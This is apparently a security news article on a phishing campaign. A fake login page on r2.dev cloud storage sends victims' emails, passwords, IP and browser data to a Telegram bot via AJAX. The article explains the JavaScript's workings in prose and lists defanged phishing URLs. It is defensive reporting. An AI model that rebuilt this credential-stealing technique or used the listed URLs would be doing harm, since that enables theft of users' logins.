Threat actors are exploiting Telegram APIs to avoid detection and illicitly obtain users’ login credentials.
Be cautious of a phishing email containing a disguised URL (hxxps[://]www[.]astunet[.]com/wp-plug/imu0nni5/3rhenqt2/) that directs you to a deceptive landing page hosted on r2.dev cloud storage (hxxps[://]pub-31a116fb226d4dfaa2004eef764a6bff[.]r2[.]dev/ayo[.]html). Stay alert and do not click on any suspicious links.
This landing page uses a JavaScript script with jQuery to handle form submissions. When a user fills out the form, the script sends a POST request containing the target’s credentials and other information, likely to a Telegram bot for further exploitation.
.webp)
It snippets implement a malicious function that exfiltrates sensitive visitor data by constructing a detailed message incorporating collected information and transmitting it to a designated Telegram chat using the Telegram API.
Join our free webinar to learn about combating slow DDoS attacks, a major threat today.
By covertly collecting and sharing victim information with threat actors, this functionality is intended to make it easier for phishing attacks to be carried out.
.webp)
The script executes upon full document load, initializing a counter variable to monitor its executions, and then extracts a Base64-encoded hash fragment from the URL, which is subsequently decoded and stored within the ‘ai’ variable.
Suppose the ‘ai’ variable contains a value. In that case, the script parses an email address from the URL, extracts the domain name, and then leverages the extracted domain name to potentially fetch and display a corresponding logo.
The script employs Telegram bot communication, utilizing separate tokens (BOT_TOKEN, LOGGER_TOKEN) for a primary bot and a potential logging bot and incorporating corresponding chat IDs (CHAT_ID, LOGGER_ID) to determine the message recipients for the bots.
.webp)
The form submission handler intercepts the default form submission behavior upon clicking the “submit-btn” button. It validates email format and password length, preventing submission if criteria aren’t met.
For valid inputs, it asynchronously sends visitor data, email, password, browser details, and MX record to a Telegram bot via AJAX.
Based on the bot’s response, the handler either displays an error message or simulates a successful login by redirecting to a specified PDF, bypassing the traditional server interaction and page reload.
Utilizes helper functions to gather visitor information and potentially send it to a specific URL, like ‘getVisitorIP’ to retrieve IP details, while `logVisitorToTelegram` asynchronously logs data to a Telegram chat. `getMXRecord` fetches email server information.
The `handleBase64Data` function decodes a variable named `FILE` (likely containing a base64 encoded URL) that might be the target for sending visitor information, including IP data processed by `sendVisitorIP`.
According to ForcePoint, the script maliciously captures user email and passwords, validates the input, and transmits stolen credentials, along with user IP and browser data, to a Telegram bot via asynchronous AJAX.
It leverages domain logo fetching for potential social engineering and prevents default form submission from executing its actions without page reload, indicating a sophisticated phishing attempt.
Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo